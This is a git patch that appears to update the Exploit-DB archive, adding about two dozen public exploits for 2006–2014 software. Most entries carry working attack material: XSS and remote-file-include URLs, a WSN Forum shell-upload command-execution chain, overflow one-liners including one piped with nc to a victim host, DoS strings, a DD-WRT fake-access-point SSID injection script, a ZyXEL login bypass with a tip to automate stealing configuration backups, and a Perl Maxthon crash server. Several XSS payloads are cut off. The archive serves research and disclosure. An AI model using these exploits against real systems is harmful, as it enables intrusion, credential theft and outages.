From b6fddc2460e1a30a589587868c2cf01257fd7788 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 13 Mar 2014 04:29:24 +0000 Subject: [PATCH] Updated 03_13_2014 --- files.csv | 25 ++++++ platforms/asp/webapps/32184.txt | 7 ++ platforms/asp/webapps/32185.txt | 7 ++ platforms/hardware/webapps/28283.txt | 7 ++ platforms/hardware/webapps/32204.txt | 17 ++++ platforms/linux/local/27425.txt | 13 +++ platforms/linux/remote/32133.txt | 9 ++ platforms/multiple/dos/32192.txt | 10 +++ platforms/multiple/dos/32193.txt | 9 ++ platforms/multiple/dos/32194.txt | 11 +++ platforms/multiple/dos/32195.txt | 11 +++ platforms/multiple/remote/32189.py | 126 +++++++++++++++++++++++++++ platforms/php/webapps/32186.txt | 10 +++ platforms/php/webapps/32187.txt | 10 +++ platforms/php/webapps/32188.txt | 26 ++++++ platforms/php/webapps/32190.txt | 9 ++ platforms/php/webapps/32191.txt | 8 ++ platforms/php/webapps/32196.txt | 9 ++ platforms/php/webapps/32198.txt | 9 ++ platforms/php/webapps/32199.txt | 9 ++ platforms/php/webapps/32200.txt | 9 ++ platforms/php/webapps/32201.txt | 9 ++ platforms/php/webapps/32202.txt | 9 ++ platforms/php/webapps/32203.txt | 9 ++ platforms/windows/local/32205.txt | 64 ++++++++++++++ platforms/windows/remote/32197.pl | 50 +++++++++++ 26 files changed, 492 insertions(+) create mode 100755 platforms/asp/webapps/32184.txt create mode 100755 platforms/asp/webapps/32185.txt create mode 100755 platforms/hardware/webapps/28283.txt create mode 100755 platforms/hardware/webapps/32204.txt create mode 100755 platforms/linux/local/27425.txt create mode 100755 platforms/linux/remote/32133.txt create mode 100755 platforms/multiple/dos/32192.txt create mode 100755 platforms/multiple/dos/32193.txt create mode 100755 platforms/multiple/dos/32194.txt create mode 100755 platforms/multiple/dos/32195.txt create mode 100755 platforms/multiple/remote/32189.py create mode 100755 platforms/php/webapps/32186.txt create mode 100755 platforms/php/webapps/32187.txt create mode 100755 platforms/php/webapps/32188.txt create mode 100755 platforms/php/webapps/32190.txt create mode 100755 platforms/php/webapps/32191.txt create mode 100755 platforms/php/webapps/32196.txt create mode 100755 platforms/php/webapps/32198.txt create mode 100755 platforms/php/webapps/32199.txt create mode 100755 platforms/php/webapps/32200.txt create mode 100755 platforms/php/webapps/32201.txt create mode 100755 platforms/php/webapps/32202.txt create mode 100755 platforms/php/webapps/32203.txt create mode 100755 platforms/windows/local/32205.txt create mode 100755 platforms/windows/remote/32197.pl diff --git a/files.csv b/files.csv index af8b0bd05..0b1f0d615 100755 --- a/files.csv +++ b/files.csv @@ -24493,6 +24493,7 @@ id,file,description,date,author,platform,type,port 27422,platforms/php/webapps/27422.txt,"CyBoards PHP Lite 1.21/1.25 Post.PHP SQL Injection Vulnerability",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0 27423,platforms/php/webapps/27423.txt,"DSCounter 1.2 Index.PHP SQL Injection Vulnerability",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0 27424,platforms/php/webapps/27424.txt,"DSDownload 1.0 - Multiple SQL-Injection Vulnerabilities",2006-03-15,"Aliaksandr Hartsuyeu",php,webapps,0 +27425,platforms/linux/local/27425.txt,"Zoo 2.10 - Parse.c Local Buffer Overflow Vulnerability",2006-03-16,"Josh Bressers",linux,local,0 27426,platforms/linux/local/27426.txt,"Zoo 2.10 Parse.c Local Buffer Overflow Vulnerability",2006-03-16,"Josh Bressers",linux,local,0 27427,platforms/php/webapps/27427.txt,"Contrexx CMS 1.0.x Index.PHP Cross-Site Scripting Vulnerability",2006-03-16,Soot,php,webapps,0 27428,platforms/hardware/remote/27428.rb,"D-Link Devices Unauthenticated Remote Command Execution",2013-08-08,metasploit,hardware,remote,0 @@ -25319,6 +25320,7 @@ id,file,description,date,author,platform,type,port 28280,platforms/php/webapps/28280.txt,"wwwThreads Calendar.PHP Cross-Site Scripting Vulnerability",2006-07-26,l2odon,php,webapps,0 28281,platforms/php/webapps/28281.txt,"phpbb-auction 1.x auction_room.php ar Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 28282,platforms/php/webapps/28282.txt,"phpbb-auction 1.x auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 +28283,platforms/hardware/webapps/28283.txt,"Zyxel Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,hardware,webapps,0 28284,platforms/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 ActiveX Control (IcoLaunch) File Execution",2013-09-15,blake,windows,remote,0 28285,platforms/php/webapps/28285.txt,"Zyxel Prestige 660H-61 ADSL Router RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,php,webapps,0 28286,platforms/windows/dos/28286.txt,"Microsoft Internet Explorer 6.0 NDFXArtEffects Stack Overflow Vulnerability",2006-07-27,hdm,windows,dos,0 @@ -28912,6 +28914,7 @@ id,file,description,date,author,platform,type,port 32130,platforms/php/webapps/32130.txt,"DEV Web Management System 1.5 Multiple Input Validation Vulnerabilities",2008-07-30,Dr.Crash,php,webapps,0 32131,platforms/php/webapps/32131.txt,"ClipSharePro <= 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps,0 32132,platforms/windows/remote/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,remote,0 +32133,platforms/linux/remote/32133.txt,"libxslt 1.1.x - RC4 Encryption and Decryption Functions Buffer Overflow Vulnerability",2008-07-31,"Chris Evans",linux,remote,0 32134,platforms/php/webapps/32134.txt,"H0tturk Panel 'gizli.php' Remote File Include Vulnerability",2008-07-31,U238,php,webapps,0 32135,platforms/php/webapps/32135.txt,"common solutions csphonebook 1.02 'index.php' Cross Site Scripting Vulnerability",2008-07-31,"Ghost Hacker",php,webapps,0 32136,platforms/osx/dos/32136.html,"Apple Mac OS X 10.x CoreGraphics Multiple Memory Corruption Vulnerabilities",2008-07-31,"Michal Zalewski",osx,dos,0 @@ -28960,3 +28963,25 @@ id,file,description,date,author,platform,type,port 32181,platforms/php/webapps/32181.txt,"Battle.net Clan Script 1.5.x 'index.php' Multiple SQL Injection Vulnerabilities",2008-08-06,IRCRASH,php,webapps,0 32182,platforms/php/webapps/32182.txt,"phpKF-Portal 1.10 baslik.php tema_dizin Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0 32183,platforms/php/webapps/32183.txt,"phpKF-Portal 1.10 anket_yonetim.php portal_ayarlarportal_dili Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0 +32184,platforms/asp/webapps/32184.txt,"KAPhotoservice order.asp page Parameter XSS",2008-08-06,by_casper41,asp,webapps,0 +32185,platforms/asp/webapps/32185.txt,"KAPhotoservice search.asp filename Parameter XSS",2008-08-06,by_casper41,asp,webapps,0 +32186,platforms/php/webapps/32186.txt,"Quate CMS 0.3.4 Multiple Cross-Site Scripting Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0 +32187,platforms/php/webapps/32187.txt,"com_utchat component Mambo and Joomla! Component 0.2 Multiple Remote File Include Vulnerabilities",2008-08-06,by_casper41,php,webapps,0 +32188,platforms/php/webapps/32188.txt,"Multiple WebmasterSite Products Remote Command Execution Vulnerability",2008-08-06,otmorozok428,php,webapps,0 +32189,platforms/multiple/remote/32189.py,"DD-WRT Site Survey SSID Script Injection Vulnerability",2008-08-06,"Rafael Dominguez Vega",multiple,remote,0 +32190,platforms/php/webapps/32190.txt,"Kshop 2.22 'kshop_search.php' Cross-Site Scripting Vulnerability",2008-08-06,Lostmon,php,webapps,0 +32191,platforms/php/webapps/32191.txt,"PHP-Nuke Kleinanzeigen Module 'lid' Parameter SQL Injection Vulnerability",2008-08-06,Lovebug,php,webapps,0 +32192,platforms/multiple/dos/32192.txt,"Combat Evolved 1.0.7.0615 - Multiple Denial Of Service Vulnerabilities",2008-08-06,"Luigi Auriemma",multiple,dos,0 +32193,platforms/multiple/dos/32193.txt,"OpenVMS 8.3 Finger Service Stack Based Buffer Overflow Vulnerability",2008-08-07,"Shaun Colley",multiple,dos,0 +32194,platforms/multiple/dos/32194.txt,"NoticeWare Email Server 4.6 NG LOGIN Messages Denial Of Service Vulnerability",2008-08-06,Antunes,multiple,dos,0 +32195,platforms/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 LIST Command Remote Denial of Service Vulnerability",2008-08-08,Antunes,multiple,dos,0 +32196,platforms/php/webapps/32196.txt,"RMSOFT MiniShop 1.0 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-09,Lostmon,php,webapps,0 +32197,platforms/windows/remote/32197.pl,"Maxthon Browser 1.x Content-Type Buffer Overflow Vulnerability",2008-08-09,DATA_SNIPER,windows,remote,0 +32198,platforms/php/webapps/32198.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS friends.php uid Parameter XSS",2008-08-09,Lostmon,php,webapps,0 +32199,platforms/php/webapps/32199.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS seutubo.php uid Parameter XSS",2008-08-09,Lostmon,php,webapps,0 +32200,platforms/php/webapps/32200.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS album.php uid Parameter XSS",2008-08-09,Lostmon,php,webapps,0 +32201,platforms/php/webapps/32201.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS scrapbook.php uid Parameter XSS",2008-08-09,Lostmon,php,webapps,0 +32202,platforms/php/webapps/32202.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS index.php uid Parameter XSS",2008-08-09,Lostmon,php,webapps,0 +32203,platforms/php/webapps/32203.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS tribes.php uid Parameter XSS",2008-08-09,Lostmon,php,webapps,0 +32204,platforms/hardware/webapps/32204.txt,"ZyXEL Router P-660HN-T1A - Login Bypass",2014-03-12,"Michael Grifalconi",hardware,webapps,0 +32205,platforms/windows/local/32205.txt,"Huawei Technologies eSpace Meeting Service 1.0.0.23 - Local Privilege Escalation",2014-03-12,LiquidWorm,windows,local,0 diff --git a/platforms/asp/webapps/32184.txt b/platforms/asp/webapps/32184.txt new file mode 100755 index 000000000..9ee1e14bc --- /dev/null +++ b/platforms/asp/webapps/32184.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/30567/info + +KAPhotoservice is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + + http://example.com/path/order.asp?cat=&apage=&albumid=&page="> \ No newline at end of file diff --git a/platforms/asp/webapps/32185.txt b/platforms/asp/webapps/32185.txt new file mode 100755 index 000000000..a4e3b38a1 --- /dev/null +++ b/platforms/asp/webapps/32185.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/30567/info + +KAPhotoservice is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +http://example.com/path/search.asp?filename="> \ No newline at end of file diff --git a/platforms/hardware/webapps/28283.txt b/platforms/hardware/webapps/28283.txt new file mode 100755 index 000000000..24aea9997 --- /dev/null +++ b/platforms/hardware/webapps/28283.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/19180/info + +The Zyxel Prestige 660H-61 ADSL Router is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/Forms/rpSysAdmin?a=%3Cscript%3Ealert('www.eazel.es')%3C/script%3E \ No newline at end of file diff --git a/platforms/hardware/webapps/32204.txt b/platforms/hardware/webapps/32204.txt new file mode 100755 index 000000000..a89bdf0cf --- /dev/null +++ b/platforms/hardware/webapps/32204.txt @@ -0,0 +1,17 @@ +# Exploit Title: ZyXEL Router P-660HN-T1A - Login Bypass +# Date: 11/03/2013 +# Exploit Author: Michael Grifalconi +# Vendor Homepage: http://www.zyxel.com/products_services/p_660hn_txa_series.shtml?t=p +# Version: 3.40(BYF.5) - (Last avaiable) + +If someone is logged on the web interface of the router, the attacker could +bypass the login form by going straigt to the default page of administration. +(The root page will ask for password) + +The vulnerability works from any IP address, the router seems to be 'free to access' from any IP +when a legit user is logged in. + +http://ROUTER-IP/rpSys.html + +You may setup a bot that checks if someone is logged and if so, download the configuration backup +to obtain the password. \ No newline at end of file diff --git a/platforms/linux/local/27425.txt b/platforms/linux/local/27425.txt new file mode 100755 index 000000000..f4fccf24c --- /dev/null +++ b/platforms/linux/local/27425.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/17126/info + +Zoo is prone to a local buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer. + +An attacker can exploit this issue to execute arbitrary code in the context of the victim user running the affected application to potentially gain elevated privileges. + +mkdir `perl -e 'print "A"x254'` +cd `perl -e 'print "A"x254'` +mkdir `perl -e 'print "A"x254'` +cd `perl -e 'print "A"x254'` +touch feh +cd ../.. +zoo a arch.zoo `perl -e 'print "A"x254 . "/" . "A"x254 . "/feh"'` \ No newline at end of file diff --git a/platforms/linux/remote/32133.txt b/platforms/linux/remote/32133.txt new file mode 100755 index 000000000..b7d533cb6 --- /dev/null +++ b/platforms/linux/remote/32133.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30467/info + +The 'libxslt' library is prone to a heap-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data. + +An attacker may exploit this issue to execute arbitrary code with the privileges of the user running an application that relies on the affected library. Failed exploit attempts will likely result in denial-of-service conditions. + +This issue affects libxslt 1.1.8 to 1.1.24. + +http://www.exploit-db.com/sploits/32133.xsl \ No newline at end of file diff --git a/platforms/multiple/dos/32192.txt b/platforms/multiple/dos/32192.txt new file mode 100755 index 000000000..11fa49691 --- /dev/null +++ b/platforms/multiple/dos/32192.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/30582/info + +Halo: Combat Evolved is prone to multiple remote denial-of-service vulnerabilities because the application fails to properly handle specially crafted network packets. + +An attacker may exploit these issues to crash the affected application, denying service to legitimate users. + +Halo: Combat Evolved 1.0.7.0615 is vulnerable; other versions may also be affected. + +http://www.exploit-db.com/sploits/32192-1.zip +http://www.exploit-db.com/sploits/32192-2.zip \ No newline at end of file diff --git a/platforms/multiple/dos/32193.txt b/platforms/multiple/dos/32193.txt new file mode 100755 index 000000000..0117ff39b --- /dev/null +++ b/platforms/multiple/dos/32193.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30589/info + +The finger service ('fingerd') on OpenVMS is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input. + +Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed attempts will likely cause denial-of-service conditions. + +We were not told which versions are affected. We will update this BID as more information emerges. + +echo `perl -e 'print "a"x1000'` | nc -v victim.example.com 79 \ No newline at end of file diff --git a/platforms/multiple/dos/32194.txt b/platforms/multiple/dos/32194.txt new file mode 100755 index 000000000..810d507d6 --- /dev/null +++ b/platforms/multiple/dos/32194.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/30605/info + +NoticeWare Email Server NG is prone to a denial-of-service vulnerability because it fails to handle user-supplied input. + +Remote attackers can exploit this issue to deny service to legitimate users. + +NoticeWare Email Server NG 4.6.2 and 4.6.3 are vulnerable; other versions may also be affected. + +The following exploit example is available: + +A001 LOGIN Ax5000 AAAAA \ No newline at end of file diff --git a/platforms/multiple/dos/32195.txt b/platforms/multiple/dos/32195.txt new file mode 100755 index 000000000..0444662c1 --- /dev/null +++ b/platforms/multiple/dos/32195.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/30606/info + +WinGate is prone to a remote denial-of-service vulnerability affecting the application's IMAP email server. + +Exploiting this issue will consume computer resources and deny access to legitimate users. + +WinGate 6.2.2 is vulnerable; other versions may also be affected. + +The following example command is available: + +LIST Ax1000 * \ No newline at end of file diff --git a/platforms/multiple/remote/32189.py b/platforms/multiple/remote/32189.py new file mode 100755 index 000000000..a09c532e1 --- /dev/null +++ b/platforms/multiple/remote/32189.py @@ -0,0 +1,126 @@ +source: http://www.securityfocus.com/bid/30573/info + +DD-WRT is prone to a script-injection vulnerability because it fails to adequately sanitize user-supplied data to the 'Site Survey' section of the administrative web interface. + +Attackers can exploit this issue to execute arbitrary script code in the DD-WRT web interface. + +Versions prior to DD-WRT 24-sp1 are vulnerable. + +#!/usr/bin/env python +# +# This tool is distributed under a BSD licence. A copy of this +# should have been included with this file. +# +# Copyright (c) 2008, Rafael Dominguez Vega. +# +# This tool is designed for the purpose of performing security +# testing only and is not intended to be used for unlawful +# activities. +# +# This tool can be used to check for SSID script injection +vulnerabilities +# in different sofware products. +# +# Help can be viewed by running this file with --help. +# +# +# Author: Rafael Dominguez Vega +# Version: 0.0.2 +# +# Further information: rafael ({dot}) dominguez-vega <(at)> +mwrinfosecurity {(dot)} com +# + +import optparse +import sys +import os +import time +from optparse import OptionParser + +class OptionParser (optparse.OptionParser): + + def check_required (self, opt): + option = self.get_option(opt) + + if getattr(self.values, option.dest) is None: + self.error("%s option not supplied" % option) + +parser = OptionParser() +parser.add_option("-i", "--interface1", action="store", +dest="ap1",help="Network interface for first Access Point (required)") +parser.add_option("-j", "--interface2", action="store", dest="ap2", +help="Network interface for second Access Point (required)") +parser.add_option("-s", "--ssid1", action="store", dest="ssid1", +help="SSID for first Access Point. Between double quotes (\"\") if +special characters are used (required)") +parser.add_option("-t", "--ssid2", action="store", dest="ssid2", +help="SSID for second Access Point. Between double quotes (\"\") if +special characters are used (required)") + +(options, args) = parser.parse_args() + +parser.check_required("-i") +if options.ap1: + ap1 = options.ap1 +else: + sys.exit(0) + +parser.check_required("-j") +if options.ap2: + ap2 = options.ap2 +else: + sys.exit(0) + +parser.check_required("-s") +if options.ssid1: + ssid1 = options.ssid1 +else: + sys.exit(0) + +parser.check_required("-t") +if options.ssid2: + ssid2 = options.ssid2 +else: + sys.exit(0) + + + +ssid1 = ssid1.replace("<", "\<") +ssid1 = ssid1.replace(">","\>") +ssid1 = ssid1.replace("(","\(") +ssid1 = ssid1.replace(")","\)") +ssid1 = ssid1.replace("$","\$") +ssid1 = ssid1.replace("&","\&") +ssid1 = ssid1.replace(";","\;") +ssid1 = ssid1.replace("|","\|") +ssid1 = ssid1.replace("*","\*") +ssid1 = ssid1.replace(" ","\ ") + +ssid2 = ssid2.replace("<", "\<") +ssid2 = ssid2.replace(">","\>") +ssid2 = ssid2.replace("(","\(") +ssid2 = ssid2.replace(")","\)") +ssid2 = ssid2.replace("$","\$") +ssid2 = ssid2.replace("&","\&") +ssid2 = ssid2.replace(";","\;") +ssid2 = ssid2.replace("|","\|") +ssid2 = ssid2.replace("*","\*") +ssid2 = ssid2.replace(" ","\ ") + + +os.system("wlanconfig "+ap1+" destroy") +os.system("wlanconfig "+ap2+" destroy") +print("\n Initialising fake APs...\n") + +os.system("wlanconfig "+ap1+" create wlandev wifi0 wlanmode ap bssid") +time.sleep(3) +os.system("iwconfig "+ap1+" essid "+ssid1) +time.sleep(2) +os.system("wlanconfig "+ap2+" create wlandev wifi0 wlanmode ap bssid") +time.sleep(3) +os.system("iwconfig "+ap2+" essid "+ssid2) + +print("Payload: "+ssid1+ssid2) + + + diff --git a/platforms/php/webapps/32186.txt b/platforms/php/webapps/32186.txt new file mode 100755 index 000000000..4bdd940fc --- /dev/null +++ b/platforms/php/webapps/32186.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/30570/info + +Quate CMS is prone to multiple cross-site scripting vulnerabilities because it fails to adequately sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Quate CMS 0.3.4 is vulnerable; other versions may also be affected. + +http://www.example.com/path/admin/includes/themes/default/header.php?page_area=[XSS] +http://www.example.com/path/admin/includes/themes/default/header.php?page_header=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/32187.txt b/platforms/php/webapps/32187.txt new file mode 100755 index 000000000..3a47c0016 --- /dev/null +++ b/platforms/php/webapps/32187.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/30571/info + +The com_utchat component for Mambo and Joomla! is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues can allow an attacker to compromise the application and the underlying computer; other attacks are also possible. + +These issues affect com_utchat 0.9.2; other versions may also be affected. + +http://www.example.com/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=[Sh3LL] +http://www.example.com/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/SetupDecorator.php?aFile=[Sh3LL] \ No newline at end of file diff --git a/platforms/php/webapps/32188.txt b/platforms/php/webapps/32188.txt new file mode 100755 index 000000000..95d1ed791 --- /dev/null +++ b/platforms/php/webapps/32188.txt @@ -0,0 +1,26 @@ +source: http://www.securityfocus.com/bid/30572/info + +Multiple WebmasterSite products are prone to a remote shell command-execution vulnerability because the applications fail to sufficiently sanitize user-supplied data. + +Successfully exploiting this issue will allow an attacker to execute arbitrary commands in the context of the affected application. + +This issue affects the following products: + +WSN Forum 4.1.43 +WSN Knowledge Base 4.1.36 +WSN Links 4.1.44 +WSN Gallery 4.1.30 + +Note that previous versions may also be vulnerable. + +Avatar evil.jpg source: + + +Enter to upload: +http://www.example.com/forum/profile.php?action=editprofile&id=[Your User ID] + +See the avatar name at your profile. + +Upload evil avatar and go to: +http://www.example.com/index.php?custom=yes&TID=../../attachments/avatars/[Avatar Name]&ext=jpg&cmd=ls -al + diff --git a/platforms/php/webapps/32190.txt b/platforms/php/webapps/32190.txt new file mode 100755 index 000000000..da4dde881 --- /dev/null +++ b/platforms/php/webapps/32190.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30576/info + +Kshop is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Kshop 2.22 is vulnerable; other versions may also be affected. + +
&Submit=Go%21&idc=0">&key="> \ No newline at end of file diff --git a/platforms/php/webapps/32198.txt b/platforms/php/webapps/32198.txt new file mode 100755 index 000000000..58e739cb9 --- /dev/null +++ b/platforms/php/webapps/32198.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30618/info + +Yogurt Social Network is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Yogurt Social Network 3.2 rc1 is affected; other versions may also be vulnerable. + +http://www.example.com/[cms]/htdocs/modules/yogurt/friends.php?uid=1"> \ No newline at end of file diff --git a/platforms/php/webapps/32199.txt b/platforms/php/webapps/32199.txt new file mode 100755 index 000000000..e62f7bf06 --- /dev/null +++ b/platforms/php/webapps/32199.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30618/info + +Yogurt Social Network is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Yogurt Social Network 3.2 rc1 is affected; other versions may also be vulnerable. + +http://www.example.com/[cms]/htdocs/modules/yogurt/seutubo.php?uid=1"> \ No newline at end of file diff --git a/platforms/php/webapps/32200.txt b/platforms/php/webapps/32200.txt new file mode 100755 index 000000000..fc0a50923 --- /dev/null +++ b/platforms/php/webapps/32200.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30618/info + +Yogurt Social Network is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Yogurt Social Network 3.2 rc1 is affected; other versions may also be vulnerable. + +http://www.example.com/[cms]/htdocs/modules/yogurt/album.php?uid=1"> \ No newline at end of file diff --git a/platforms/php/webapps/32201.txt b/platforms/php/webapps/32201.txt new file mode 100755 index 000000000..ffe376784 --- /dev/null +++ b/platforms/php/webapps/32201.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30618/info + +Yogurt Social Network is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Yogurt Social Network 3.2 rc1 is affected; other versions may also be vulnerable. + +http://www.example.com/[cms]/htdocs/modules/yogurt/scrapbook.php?uid=1"> \ No newline at end of file diff --git a/platforms/php/webapps/32202.txt b/platforms/php/webapps/32202.txt new file mode 100755 index 000000000..9af4f7547 --- /dev/null +++ b/platforms/php/webapps/32202.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30618/info + +Yogurt Social Network is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Yogurt Social Network 3.2 rc1 is affected; other versions may also be vulnerable. + +http://www.example.com/[cms]/htdocs/modules/yogurt/index.php?uid=1"> \ No newline at end of file diff --git a/platforms/php/webapps/32203.txt b/platforms/php/webapps/32203.txt new file mode 100755 index 000000000..bcd5cd750 --- /dev/null +++ b/platforms/php/webapps/32203.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30618/info + +Yogurt Social Network is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Yogurt Social Network 3.2 rc1 is affected; other versions may also be vulnerable. + +http://www.example.com/[cms]/htdocs/modules/yogurt/tribes.php?uid=1"> \ No newline at end of file diff --git a/platforms/windows/local/32205.txt b/platforms/windows/local/32205.txt new file mode 100755 index 000000000..3aa5ab233 --- /dev/null +++ b/platforms/windows/local/32205.txt @@ -0,0 +1,64 @@ +? +Huawei Technologies eSpace Meeting Service 1.0.0.23 Local Privilege Escalation + + +Vendor: Huawei Technologies Co., Ltd. +Product web page: http://www.huawei.com +Affected version: 1.0.0.23 (V100R001C03SPC201B050) + +Summary: Huawei's eSpace Meeting solution fully meets the needs of enterprise +customers for an integrated daily collaboration system by integrating the +conference server, conference video terminal, conference user authorization, +and teleconference. + +Desc: The application is vulnerable to an elevation of privileges vulnerability +which can be used by a simple user that can change the executable file with a +binary of choice. The vulnerability exist due to the improper permissions, with +the 'F' flag (full) for the 'Users' group, for the 'eMservice.exe' binary file. +The service is installed by default to start on system boot with LocalSystem +privileges. Attackers can replace the binary with their rootkit, and on reboot +they get SYSTEM privileges. + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + + +Vulnerbility discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5171 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5171.php + +Huawei ID: Huawei-SA-20140310-01 +Huawei Advisory: http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-329170.htm + + + +18.01.2014 + +------------------------------------ + +C:\>sc qc eSpaceMeeting +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: eSpaceMeeting + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\ProgramData\eSpaceMeeting\eMservice.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : eSpaceMeeting + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\>icacls ProgramData\eSpaceMeeting\eMservice.exe +ProgramData\eSpaceMeeting\eMservice.exe BUILTIN\Users:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + BUILTIN\Administrators:(I)(F) + +Successfully processed 1 files; Failed processing 0 files + +C:\> + +------------------------------------ diff --git a/platforms/windows/remote/32197.pl b/platforms/windows/remote/32197.pl new file mode 100755 index 000000000..2b851cf49 --- /dev/null +++ b/platforms/windows/remote/32197.pl @@ -0,0 +1,50 @@ +source: http://www.securityfocus.com/bid/30617/info + +Maxthon Browser is prone to a buffer-overflow vulnerability. + +An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. + +Versions prior to Maxthon Browser 2.0 are vulnerable. + +#!/usr/bin/perl # Maxthon Browser << 2.0 Stack Overflow Crash # Descoverd by DATA_SNIPER # Usage: #connect from maxthon browser to http:/127.0.0.1/ +use IO::Socket; +my $sock=new IO::Socket::INET ( +Listen => 1, + +LocalAddr => 'localhost', + +LocalPort => 80, + +Proto => + 'tcp'); die unless $sock; +$huge="A" x 1100000; +$|=1; print "===================================================================\n"; +print " Mawthon Browser << 2.0 Stack Overflow Crash\n"; +print " Bug Descoverd by DATA_SNIPER\n"; +print " GreetZ To:Alpha_Hunter,Pirat 